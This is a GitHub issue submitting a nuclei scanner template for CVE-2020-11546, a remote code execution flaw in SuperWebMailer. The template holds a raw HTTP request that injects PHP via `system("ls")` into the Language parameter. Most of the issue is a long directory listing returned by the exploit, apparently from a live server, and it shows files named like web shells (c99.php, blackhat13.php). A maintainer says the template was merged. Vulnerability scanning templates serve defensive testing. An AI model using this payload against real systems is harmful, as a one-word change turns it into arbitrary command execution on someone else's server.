search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.32k stars 2.64k forks source link

CVE-2020-11546 #3433

Closed Official-BlackHat13 closed 2 years ago

Official-BlackHat13 commented 2 years ago

Template Information:

SuperWebMailer Remote Code Execution

Description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection

Reference:

Nuclei Template:

id: CVE-2020-11546

info:
  author: Official_BlackHat13
  severity: critical
  name: SuperWebmailer Remote Code Execution
  description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
  tags: cve,cve2020,rce,superwebmailer
  reference:
    - https://github.com/Official-BlackHat13/CVE-2020-11546/
    - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11546
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11546
    cwe-id: CWE-94

requests:
  - raw:
      - |
        POST /mailingupgrade.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded

        step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E

    payloads:
      path:
        - superwebmailer/
        - newsletter/swm/
        - swm/

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - ajax_ccea.php
          - ajax_getemailingactions.php
          - ajax_getemailtemplates.php

Result

ECG                                                                                                                                                                    
PEAR                                                                                                                                                                   
UASparser                                                                                                                                                              
Zebra_cURL.php                                                                                                                                                         
__FusionCharts__                                                                                                                                                       
ajax_ccea.php                                                                                                                                                          
ajax_getemailingactions.php                                                                                                                                            
ajax_getemailtemplates.php                                                                                                                                             
ajax_getforms.php                                                                                                                                                      
ajax_getgroups.php                                                                                                                                                     
ajax_getmailinglists.php                                                                                                                                               
ajax_gettargetgroups.php                                                                                                                                               
ajax_getuserpermissions.php                                                                                                                                            
ajax_htmltoplaintext.php                                                                                                                                               
ajax_load_new_ipe_elements.php                                                                                                                                         
ajax_showtargetgroups.php                                                                                                                                              
api                                                                                                                                                                    
attachmentsdelete.php                                                                                                                                                  
attachmentsupload.php                                                                                                                                                  
autoimportedit.php                                                                                                                                                     
autoresponderedit.php                                                                                                                                                  
birthdayresponderedit.php                                                                                                                                              
blackhat13.php                                                                                                                                                         
blank.htm                                                                                                                                                              
blank.html                                                                                                                                                             
blocklistmemberedit.php                                                                                                                                                
blocklistmemberimport.php                                                                                                                                              
bouncer.php                                                                                                                                                            
browseautoimports.php                                                                                                                                                  
browseautoresponders.php                                                                                                                                               
browsebirthdayresponders.php                                                                                                                                           
browseblmembers.php                                                                                                                                                    
browsecampaigns.php                                                                                                                                                    
browsedistriblists.php                                                                                                                                                 
browsedistriblists_entries.php                                                                                                                                         
browsedomainblmembers.php                                                                                                                                              
browseforms.php                                                                                                                                                        
browsefunctionparams.php                                                                                                                                               
browsefunctions.php                                                                                                                                                    
browsefuresponderemails.php                                                                                                                                            
browsefuresponders.php                                                                                                                                                 
browsefuresponders_nextmails.php                                                                                                                                       
browseinboxes.php                                                                                                                                                      
browselocalmessages.php                                                                                                                                                
browsemailinglists.php                                                                                                                                                 
browsemessages.php                                                                                                                                                     
browsemtas.php                                                                                                                                                         
browsenas.php                                                                                                                                                          
browseoutqueue.php                                                                                                                                                     
browsepages.php                                                                                                                                                        
browser.php                                                                                                                                                            
browsercpts.php                                                                                                                                                        
browserdetect.inc.php                                                                                                                                                  
browsereasonsforunsubscription.php                                                                                                                                     
browserss2emailresponders.php                                                                                                                                          
browsesearchrecipients_results.php                                                                                                                                     
browsesmscampaigns.php                                                                                                                                                 
browsesplittests.php                                                                                                                                                   
browsetargetgroups.php                                                                                                                                                 
browsetemplates.php                                                                                                                                                    
browsetextblocks.php                                                                                                                                                   
browseusers.php                                                                                                                                                        
c99.php                                                                                                                                                                
campaign_ops.inc.php                                                                                                                                                   
campaigncreate.inc.php                                                                                                                                                 
campaigncreate.php                                                                                                                                                     
campaignedit.php                                                                                                                                                       
campaignlivesend.php                                                                                                                                                   
campaignsendstatselect.inc.php                                                                                                                                         
campaignstools.inc.php                                                                                                                                                 
captcha                                                                                                                                                                
chartcultureinfo.inc.php                                                                                                                                               
ckeditor                                                                                                                                                               
config.inc.php                                                                                                                                                         
config_db.default.inc.php                                                                                                                                              
config_db.inc.php                                                                                                                                                      
config_paths.default.inc.php                                                                                                                                           
config_paths.inc.php                                                                                                                                                   
countrydetect.inc.php                                                                                                                                                  
cron_autoimport.inc.php                                                                                                                                                
cron_autoresponders.inc.php                                                                                                                                            
cron_birthdayresponders.inc.php                                                                                                                                        
cron_bounces.inc.php                                                                                                                                                   
cron_campaigns.inc.php                                                                                                                                                 
cron_distriblists.inc.php                                                                                                                                              
cron_eventresponders.inc.php                                                                                                                                           
cron_furesponders.inc.php                                                                                                                                              
cron_logcleanup.inc.php                                                                                                                                                
cron_rss2emailresponders.inc.php                                                                                                                                       
cron_sendengine.inc.php                                                                                                                                                
cron_sendengine_multithreaded.inc.php                                                                                                                                  
cron_smscampaigns.inc.php                                                                                                                                              
cron_splittests.inc.php                                                                                                                                                
cron_subunsubcheck.inc.php                                                                                                                                             
crons.php                                                                                                                                                              
csrf.inc.php                                                                                                                                                           
css                                                                                                                                                                    
current_time.php                                                                                                                                                       
dashboard.inc.php                                                                                                                                                      
dashboard.php                                                                                                                                                          
dbimporthelper.inc.php                                                                                                                                                 
defaultnewsletter.php                                                                                                                                                  
defaulttexts.inc.php                                                                                                                                                   
distriblist_ops.inc.php                                                                                                                                                
distriblistconfirm.php                                                                                                                                                 
distriblistcreate.inc.php                                                                                                                                              
distriblistcreate.php                                                                                                                                                  
distriblistedit.php                                                                                                                                                    
distriblistentryselect.inc.php                                                                                                                                         
distribliststools.inc.php                                                                                                                                              
domainblocklistmemberedit.php                                                                                                                                          
domainblocklistmemberimport.php                                                                                                                                        
exportblocklist.php                                                                                                                                                    
exportdomainblocklist.php                                                                                                                                              
exportrecipients.php                                                                                                                                                   
facebook.com                                                                                                                                                           
facebooksend.php                                                                                                                                                       
favicon.ico                                                                                                                                                            
fcktemplates.php                                                                                                                                                       
formcode.php                                                                                                                                                           
formedit.php                                                                                                                                                           
fumailcreate.inc.php                                                                                                                                                   
fumailedit.php                                                                                                                                                         
fumailselect.inc.php                                                                                                                                                   
fums_ops.inc.php                                                                                                                                                       
functionedit.php                                                                                                                                                       
functions.inc.php                                                                                                                                                      
functions_charmapping.inc.php                                                                                                                                          
furespondercreate.inc.php                                                                                                                                              
furesponderedit.php                                                                                                                                                    
geoip                                                                                                                                                                  
geolocation.inc.php                                                                                                                                                    
geolocation2.inc.php                                                                                                                                                   
googleanalytics.inc.php                                                                                                                                                
help                                                                                                                                                                   
help.php                                                                                                                                                               
html2pdf                                                                                                                                                               
htmledit.php                                                                                                                                                           
htmltemplates.php                                                                                                                                                      
htmltools.inc.php                                                                                                                                                      
images                                                                                                                                                                 
importrecipients.php                                                                                                                                                   
importrecipientsmysql.inc.php                                                                                                                                          
inbox_test.php                                                                                                                                                         
inboxcheck.php                                                                                                                                                         
inboxedit.php                                                                                                                                                          
index.php                                                                                                                                                              
install_done.php                                                                                                                                                       
ipe                                                                                                                                                                    
ipe_loadhtmltemplate.php                                                                                                                                               
joomla                                                                                                                                                                 
js                                                                                                                                                                     
js_localization.php                                                                                                                                                    
jsonencode.inc.php                                                                                                                                                     
kali                                                                                                                                                                   
kali-linux-2021.3-virtualbox-amd64.ova                                                                                                                                 
keepalive.php                                                                                                                                                          
language                                                                                                                                                               
ldap_auth.php                                                                                                                                                          
link.php                                                                                                                                                               
loadfile.php                                                                                                                                                           
loadsmebar.php                                                                                                                                                         
localmessages_ops.inc.php                                                                                                                                              
login.php                                                                                                                                                              
login_page.inc.php                                                                                                                                                     
logout.php                                                                                                                                                             
magento                                                                                                                                                                
mail-signature.class.php                                                                                                                                               
mail.php                                                                                                                                                               
mailcreate.inc.php                                                                                                                                                     
mailer.php                                                                                                                                                             
mailheaderfieldsaddedit.php                                                                                                                                            
mailinglist_ops.inc.php                                                                                                                                                
mailinglistcreate.inc.php                                                                                                                                              
mailinglistcreate.php                                                                                                                                                  
mailinglistedit.php                                                                                                                                                    
mailinglistq.inc.php                                                                                                                                                   
mailinglistselect.inc.php                                                                                                                                              
mailinglistsubunsubstat.php                                                                                                                                            
mailinglistsubunsubstat_geo.php                                                                                                                                        
mailinglistsubunsubstat_iframe_geo.php                                                                                                                                 
mailingupgrade.php                                                                                                                                                     
maillogger.php                                                                                                                                                         
messageedit.php                                                                                                                                                        
ml_remove_recipients_by_blocklists.php                                                                                                                                 
mta_test.php                                                                                                                                                           
mtaedit.php                                                                                                                                                            
mysqli                                                                                                                                                                 
na                                                                                                                                                                     
naedit.php                                                                                                                                                             
newlocalmessage.php                                                                                                                                                    
newsletter_templates                                                                                                                                                   
newslettersubunsub_ops.inc.php                                                                                                                                         
newslettersubunsubcheck.inc.php                                                                                                                                        
nl.php                                                                                                                                                                 
nlu.php                                                                                                                                                                
onlineupdate.inc.php                                                                                                                                                   
ostat.php                                                                                                                                                              
outqueue_ops.inc.php                                                                                                                                                   
ownaccountedit.php                                                                                                                                                     
pageedit.php                                                                                                                                                           
pdf.inc.php                                                                                                                                                            
persattachmentsaddedit.php                                                                                                                                             
php_register_globals_off.inc.php                                                                                                                                       
phpcompat.php                                                                                                                                                          
phpinfo.php                                                                                                                                                            
plaintexttemplates.php                                                                                                                                                 
plugins                                                                                                                                                                
profile.php                                                                                                                                                            
pw_reminder.php                                                                                                                                                        
rcptscolumns.php                                                                                                                                                       
reasonforunsubscriptionedit.php                                                                                                                                        
reasonsforunsubscription_vote.php                                                                                                                                      
recipientedit.php                                                                                                                                                      
recipients_ops.inc.php                                                                                                                                                 
removeautoimport.inc.php                                                                                                                                               
removeautoresponder.inc.php                                                                                                                                            
removebirthdayresponder.inc.php                                                                                                                                        
removeform.inc.php                                                                                                                                                     
removefuresponder.inc.php                                                                                                                                              
removeinbox.inc.php                                                                                                                                                    
removemessage.inc.php                                                                                                                                                  
removemta.inc.php                                                                                                                                                      
removena.inc.php                                                                                                                                                       
removepage.inc.php                                                                                                                                                     
removerss2emailresponder.inc.php                                                                                                                                       
replacements.inc.php                                                                                                                                                   
responderpreview.php                                                                                                                                                   
responders_cleanup.inc.php                                                                                                                                             
responderselect.inc.php                                                                                                                                                
ressources.inc.php                                                                                                                                                     
ressources_array_access.inc.php                                                                                                                                        
robots.txt                                                                                                                                                             
rss2emailreplacements.inc.php                                                                                                                                          
rss2emailresponderedit.php                                                                                                                                             
rss2emailtemplate                                                                                                                                                      
rssparser.php                                                                                                                                                          
sanitize.inc.php                                                                                                                                                       
savedoptions.inc.php                                                                                                                                                   
searchrecipients.php                                                                                                                                                   
searchrecipients_ops.inc.php                                                                                                                                           
securitycheck.inc.php                                                                                                                                                  
sendmail_mt.php                                                                                                                                                        
serialmailpreview.php                                                                                                                                                  
serialmailpreviewitem.php                                                                                                                                              
sessioncheck.inc.php                                                                                                                                                   
settings_authsettings.php                                                                                                                                              
settings_branding.php                                                                                                                                                  
settings_cron.php                                                                                                                                                      
settings_db.php                                                                                                                                                        
settings_editfields.php                                                                                                                                                
settings_preferences.php                                                                                                                                               
settings_test.php                                                                                                                                                      
sha1.php                                                                                                                                                               
show_facebookpostdlg.php                                                                                                                                               
show_na.php                                                                                                                                                            
show_saved_data.php                                                                                                                                                    
show_twitterpostdlg.php                                                                                                                                                
showstatsummary.php                                                                                                                                                    
smscampaign_ops.inc.php                                                                                                                                                
smscampaigncreate.php                                                                                                                                                  
smscampaignedit.php                                                                                                                                                    
smscampaignlivesend.php                                                                                                                                                
smscampaignsendstatselect.inc.php                                                                                                                                      
smscampaignstools.inc.php                                                                                                                                              
smsout.inc.php                                                                                                                                                         
spamtest_external.php                                                                                                                                                  
splittest_ops.inc.php                                                                                                                                                  
splittestcreate.php                                                                                                                                                    
splittestedit.php                                                                                                                                                      
splitteststools.inc.php                                                                                                                                                
sql                                                                                                                                                                    
stat_autoresponderlog.php                                                                                                                                              
stat_birthdayresponderlog.php                                                                                                                                          
stat_campaign_overlay.php                                                                                                                                              
stat_campaign_overlay_getclicks.php                                                                                                                                    
stat_campaignlog.php                                                                                                                                                   
stat_campaigntracking.php                                                                                                                                              
stat_campaigntracking_geo.php                                                                                                                                          
stat_campaigntracking_iframe_geo.php                                                                                                                                   
stat_campaigntracking_recipients.php                                                                                                                                   
stat_distriblistlog.php                                                                                                                                                
stat_furesponderlog.php                                                                                                                                                
stat_processlog.php                                                                                                                                                    
stat_respondertracking.php                                                                                                                                             
stat_respondertracking_geo.php                                                                                                                                         
stat_respondertracking_iframe_geo.php                                                                                                                                  
stat_respondertracking_recipients.php                                                                                                                                  
stat_rss2emailresponderlog.php                                                                                                                                         
stat_sentmails.php                                                                                                                                                     
stat_smscampaignlog.php                                                                                                                                                
stat_splittestlog.php                                                                                                                                                  
stat_splittesttracking.php                                                                                                                                             
superadmin.inc.php                                                                                                                                                     
superadmincreate.php                                                                                                                                                   
supermailer_import.php                                                                                                                                                 
supermailer_upload.php                                                                                                                                                 
targetgroupedit.php                                                                                                                                                    
targetgroups.inc.php                                                                                                                                                   
templateedit.php                                                                                                                                                       
templates                                                                                                                                                              
templates.inc.php                                                                                                                                                      
test.php                                                                                                                                                               
textblockedit.php                                                                                                                                                      
tracking_inst.inc.php                                                                                                                                                  
twitter.inc.php                                                                                                                                                        
twitterauth.php                                                                                                                                                        
twitterconfig.inc.php                                                                                                                                                  
twittersend.php                                                                                                                                                        
upgrade_done.php                                                                                                                                                       
userdefined.inc.php                                                                                                                                                    
userfiles                                                                                                                                                              
users_ops.inc.php                                                                                                                                                      
usersedit.php                                                                                                                                                          
utf8converter.inc.php                                                                                                                                                  
version.inc.php                                                                                                                                                        
wordpress                                                                                                                                                              
wrapper
ehsandeep commented 2 years ago

thank you for sharing this @Official-BlackHat13, this is now added into project with linked PR.